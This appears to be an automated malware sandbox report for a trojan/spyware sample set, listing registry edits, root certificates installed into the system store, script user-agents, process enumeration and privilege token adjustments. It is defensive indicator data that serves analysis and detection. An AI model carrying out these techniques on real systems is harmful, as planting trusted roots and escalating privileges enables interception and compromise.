Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\VersionIndependentProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\SYNCENGINESTORAGEPROVIDERHANDLERPROXY.SYNCENGINESTORAGEPROVIDERHANDLERPROXY\CLSID	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{0D4E4444-CB20-4C2B-B8B2-94E5656ECAE8}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\SYNCENGINEFILEINFOPROVIDER.SYNCENGINEFILEINFOPROVIDER\CLSID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\OOBERequestHandler.OOBERequestHandler.1\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 26384faba5a7d701	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\ = "FileSyncClient AutoPlayHandler Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ProgID\ = "OOBERequestHandler.OOBERequestHandler.1"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\LocalServer32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ProgID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ = "FileSyncOutOfProcServices Class"	OneDriveSetup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ = "IFileSyncClient2"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ = "PSFactoryBuffer"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\INPROCSERVER32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\INPROCSERVER32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ = "IFileSyncClient"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "6e-1"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ = "SyncEngineFileInfoProvider Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\0	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\BannerNotificationHandler.BannerNotificationHandler\CurVer\ = "BannerNotificationHandler.AutoBannerNotificationHandlerPlayHandler.1"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun05ac1b0207d3ff3b8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	240	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4248	powershell.exe
4248	powershell.exe
4308	3918119.exe
4308	3918119.exe
4248	powershell.exe
4248	powershell.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
4896	rundll32.exe
4896	rundll32.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
2556	svchost.exe
2556	svchost.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
1788	WerFault.exe
1788	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3036	Explorer.EXE

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
4308	3918119.exe
2176	MicrosoftEdgeCP.exe
2176	MicrosoftEdgeCP.exe
2176	MicrosoftEdgeCP.exe
2176	MicrosoftEdgeCP.exe
1388	wtbbrhc
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
6564	wtbbrhc
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe
6904	wtbbrhc
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5312	7616646.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4284	Sun059375dac544fc4a.exe
Token: SeCreateTokenPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeAssignPrimaryTokenPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeLockMemoryPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeIncreaseQuotaPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeMachineAccountPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeTcbPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeSecurityPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeTakeOwnershipPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeLoadDriverPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeSystemProfilePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeSystemtimePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeProfSingleProcessPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeIncBasePriorityPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeCreatePagefilePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeCreatePermanentPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeBackupPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeRestorePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeShutdownPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeAuditPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeSystemEnvironmentPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeChangeNotifyPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeRemoteShutdownPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeUndockPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeSyncAgentPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeEnableDelegationPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeManageVolumePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeImpersonatePrivilege	4340	Sun05d60bc3b96248e5.exe
Token: SeCreateGlobalPrivilege	4340	Sun05d60bc3b96248e5.exe
Token: 31	4340	Sun05d60bc3b96248e5.exe
Token: 32	4340	Sun05d60bc3b96248e5.exe
Token: 33	4340	Sun05d60bc3b96248e5.exe
Token: 34	4340	Sun05d60bc3b96248e5.exe
Token: 35	4340	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeDebugPrivilege	4332	Sun050462125c7d35.exe
Token: SeDebugPrivilege	648	2.exe
Token: SeDebugPrivilege	5088	2257784.exe
Token: SeDebugPrivilege	4292	PublicDwlBrowser1100.exe
